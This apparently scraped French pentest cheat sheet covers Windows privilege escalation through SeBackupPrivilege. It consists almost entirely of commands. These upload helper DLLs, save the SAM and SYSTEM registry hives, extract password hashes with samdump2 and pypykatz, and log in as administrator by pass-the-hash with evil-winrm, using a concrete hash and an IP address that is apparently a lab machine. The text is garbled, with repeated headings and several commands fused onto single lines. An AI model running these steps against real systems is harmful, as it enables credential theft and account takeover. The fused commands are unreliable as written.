SeBackupPrivilege (whoami /priv) - Windows Privilege Escalation
whoami /priv



Extraction des hachages du fichier SAM


Pass-the-Hash avec Evil-WinRM

Mis à jour
whoami /priv






Mis à jour
upload SeBackupPrivilegeCmdLets.dll
upload SeBackupPrivilegeUtils.dllImport-Module .\SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dllreg save hklm\sam sam
reg save hklm\system systemdownload sam
download systemsamdump2 system sampypykatz registry system --sam samevil-winrm -i 10.10.11.35 -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341